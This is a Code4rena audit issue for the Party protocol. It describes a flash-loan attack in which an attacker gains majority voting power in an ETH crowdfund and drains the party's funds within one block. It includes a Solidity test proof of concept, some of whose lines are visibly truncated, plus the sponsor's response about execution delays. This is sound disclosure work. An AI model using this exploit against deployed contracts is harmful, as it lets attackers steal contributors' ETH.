code-423n4 / 2023-04-party-findings

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An attacker can contribute to the ETH crowdfund using a flash loan and control the party as he likes. #25

Open code423n4 opened 1 year ago

code423n4 commented 1 year ago

Lines of code

Vulnerability details


An attacker can have more than half of the total voting power using a flash loan and abuse other contributors.

Proof of Concept

The main flaw is that the party can distribute funds right after the crowdfund is finalized within the same block.

So the attacker can contribute using a flash loan and repay by distributing the part's ETH.

  1. Let's assume maxContribution = type(uint96).max, minTotalContributions = 10 ether, maxTotalContributions = 20 ether, fundingSplitBps = 0.
  2. An attacker contributes 1 ether(attacker's fund) to the crowdfund and another user contributes 9 ether.
  3. The attacker knows the crowdfund will be finalized as it satisfies the minTotalContributions already but he will have 10% of the total voting power.
  4. So he decides to contribute 10 ether using a flash loan.
  5. In ETHCrowdfundBase._processContribution(), the crowdfund will be finalized immediately as total contribution is greater than maxTotalContributions.
  6. Then the attacker will have (1 + 10) / 20 = 55% voting power of the party and he can pass any proposal.
  7. So he calls distribute() with 19 ether. distribute() can be called directly if opts.distributionsRequireVote == false, otherwise, he should create/execute the distribution proposal and he can do it within the same block.
  8. After that, he can receive ETH using TokenDistributor.claim() and the amount will be 19 * 55% = 10.45 ether. (We ignore the distribution fee for simplicity)
  9. He repays 10 ether to the flash loan provider and he can control the party as he likes now.

This attack is possible for both InitialETHCrowdfund and ReraiseETHCrowdfund.

Tools Used

Manual Review

Recommended Mitigation Steps

I think we should implement a kind of cooldown logic after the crowdfund is finalized.

  1. Add a partyStartedTime in PartyGovernance.sol.
  2. While finalizing the ETH crowdfund in ETHCrowdfundBase._finalize(), we set party.partyStartedTime = block.timestamp.
  3. After that, PartyGovernance.distribute() can work only when block.timestamp > partyStartTime.
0xean commented 1 year ago

coded POC would have been welcomed here due to the number of steps in the attack, will review further.

hansfriese commented 1 year ago

Hello @0xean Here is a POC. It should be appended to InitialETHCrowdfund.t.sol

function test_finalizeUsingFlashloan() public {
        InitialETHCrowdfund crowdfund = _createCrowdfund({
            initialContribution: 0,
            initialContributor: payable(address(0)),
            initialDelegate: address(0),
            minContributions: 0,
            maxContributions: type(uint96).max,
            disableContributingForExistingCard: false,
            minTotalContributions: 10 ether,
            maxTotalContributions: 20 ether,
            duration: 7 days,
            fundingSplitBps: 0,
            fundingSplitRecipient: payable(address(0))

        TokenDistributor distributor = new TokenDistributor(globals, 0);
        globals.setAddress(LibGlobals.GLOBAL_TOKEN_DISTRIBUTOR, address(distributor));

        Party party =;

        // Attacker has 1 ether now
        address attacker = _randomAddress();, 1 ether);

        // An honest member has 9 ether
        address member = _randomAddress();, 9 ether);

        // Contribute
        uint256 vp1 = crowdfund.contribute{ value: 1 ether }(attacker, "");

        crowdfund.contribute{ value: 9 ether }(member, "");

        // Attacker noticed his voting power will be 10% after finalization, so he decided to contribute 10 ether using flashloan, 10 ether); // he borrowed 10 ether

        uint256 vp2 = crowdfund.contributeFor{ value: 10 ether }(1, payable(attacker), attacker, ""); //contributed 10 ether again

        // Crowdfund is finalized
        assertTrue(crowdfund.getCrowdfundLifecycle() == ETHCrowdfundBase.CrowdfundLifecycle.Finalized);
        assertEq(party.getGovernanceValues().totalVotingPower, 20 ether);
        assertEq(vp1 + vp2, 11 ether); //his voting power is 11/20 = 55% now
        assertEq(address(party).balance, 20 ether);
        assertEq(address(attacker).balance, 0); //attacker's eth balance = 0

        // attacker starts eth distribution of 19 ether from party's balance
        ITokenDistributor.DistributionInfo memory distInfo = party.distribute(19 ether, ITokenDistributor.TokenType.Native, address(0), 0);

        assertEq(address(distributor).balance, 19 ether); //distributor's balance
        assertEq(address(party).balance, 1 ether); //party's remaining balance

        distributor.claim(distInfo, 1); //attacker claims 55% of 19 ether

        assertEq(address(attacker).balance, 10.45 ether); //finally, attacker's balance = 10.45 ether and he can repay the flashloan
        assertEq(party.getGovernanceValues().totalVotingPower, 20 ether);
        assertEq(vp1 + vp2, 11 ether); //his voting power is still 55%
c4-sponsor commented 1 year ago

0xble marked the issue as sponsor confirmed

0xble commented 1 year ago

Great finding, still debating the mitigation internally.

c4-judge commented 1 year ago

0xean marked the issue as satisfactory

0xble commented 1 year ago

Looking into this more, the issue can only occur if a party sets an executionDelay of 0. In the POC, the party was created with default values (null) which is why this could happen in testing. However if changed to a nonzero value, it would require waiting delay duration before the proposal could be executed which would prevent the repayment of the flash loan in a single execution. Since parties are expected to have a nonzero execution delay, we are less concerned about the flash loan aspect of this attack.

This finding did prompt us to consider the risk of majority attacks more broadly, where an individual can contribute and become a majority voter in a party (flash loan or not) and take control of the party. We acknowledged the majority attack before audit and don't consider it a vulnerability. Our reasoning is (1) our governance model prioritizes simplicity and speed of coordination which would be sacrificed by introducing more complex mechanisms to robustly protect against majority attacks and (2) the expectation is parties will have reasonable governance settings and active governance to veto malicious proposals to manage the risk of a majority attack and if they don't (e.g. set an execution delay of 0) it is a deliberate choice on their part rather than a vulnerability.

c4-sponsor commented 1 year ago

0xble marked the issue as sponsor acknowledged